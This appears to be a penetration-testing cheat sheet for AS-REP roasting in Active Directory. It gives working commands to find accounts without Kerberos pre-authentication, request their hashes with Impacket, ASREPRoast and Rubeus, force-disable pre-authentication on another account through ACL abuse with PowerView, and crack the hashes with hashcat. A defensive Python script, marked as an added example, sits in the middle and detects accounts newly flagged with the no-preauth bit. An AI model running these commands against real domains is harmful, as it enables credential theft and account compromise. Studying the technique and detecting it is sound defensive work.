AS-REP Roasting
Kerberos Pre-Auth Disabled
Enumerating accounts with Kerberos Pre-auth disabled
Using PowerView (dev):
Get-DomainUser -PreauthNotRequired -Verbose
Using Active Directory module:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Using Impacket tools:
impacket-GetNPUsers 'htb.local/' -dc-ip 10.10.10.161
impacket-GetNPUsers evilcorp.local/ -dc-ip 192.168.23.157 -usersfile usernames.txt
impacket-GetNPUsers 'htb.local/' -dc-ip 10.10.10.161 -request
ASREPRoast.ps1
. .\ASREPRoast\ASREPRoast.ps1
Get-ASREPHash -UserName VPN1user -Verbose
To enumerate all users with Kerberos preauth disabled and request a hash:
Invoke-ASREPRoast -Verbose
Rubeus
.\Rubeus.exe asreproast /nowrap
Force disable Kerberos Preauth:
Let's enumerate the permissions for RDPUsers on ACLs using PowerView (dev):
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose
Get-DomainUser -PreauthNotRequired -Verbose
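For defenders, the change above shows up as the DONT_REQ_PREAUTH bit (4194304, 0x400000) appearing in userAccountControl. The following is an added example, not part of the original page or of PowerView: it compares two constructed exports of sAMAccountName and userAccountControl and reports accounts whose preauth requirement was removed between them. The CSV layout, the state labels and the account names svc_old, jdoe and newuser are assumptions.

```python
import csv
import io

DONT_REQ_PREAUTH = 0x400000  # 4194304, the userAccountControl bit used on this page
ACCOUNTDISABLE = 0x2

# Constructed CSV exports (sAMAccountName,userAccountControl) taken at two times.
BEFORE = """sAMAccountName,userAccountControl
Control1User,512
VPN1user,4194816
svc_old,4194818
jdoe,66048
"""
AFTER = """sAMAccountName,userAccountControl
Control1User,4194816
VPN1user,512
svc_old,4194818
jdoe,66048
newuser,4194816
"""

def load(text):
    """Parse an export into {account: userAccountControl as int}."""
    return {r["sAMAccountName"]: int(r["userAccountControl"])
            for r in csv.DictReader(io.StringIO(text))}

def no_preauth(uac):
    """True when the account does not require Kerberos pre-authentication."""
    return bool(uac & DONT_REQ_PREAUTH)

def audit(before, after):
    """Classify each account in the later snapshot that is or was exposed."""
    findings = {}
    for name, uac in after.items():
        was, now = no_preauth(before.get(name, 0)), no_preauth(uac)
        if now and not was:
            state = "NEWLY_EXPOSED"   # bit set since the last snapshot: find who changed it
        elif now:
            state = "STILL_EXPOSED"   # long-standing setting: review and re-enable preauth
        elif was:
            state = "REMEDIATED"      # bit cleared since the last snapshot
        else:
            continue
        if now and uac & ACCOUNTDISABLE:
            state += "_DISABLED_ACCOUNT"  # lower urgency: the KDC rejects disabled accounts
        findings[name] = state
    return findings

if __name__ == "__main__":
    for name, state in sorted(audit(load(BEFORE), load(AFTER)).items()):
        print(f"{state:32} {name}")
```

Because -XOR toggles the bit rather than setting it, the same value applied a second time restores the preauth requirement, which this comparison reports as REMEDIATED.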
Cracking AS-REP
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force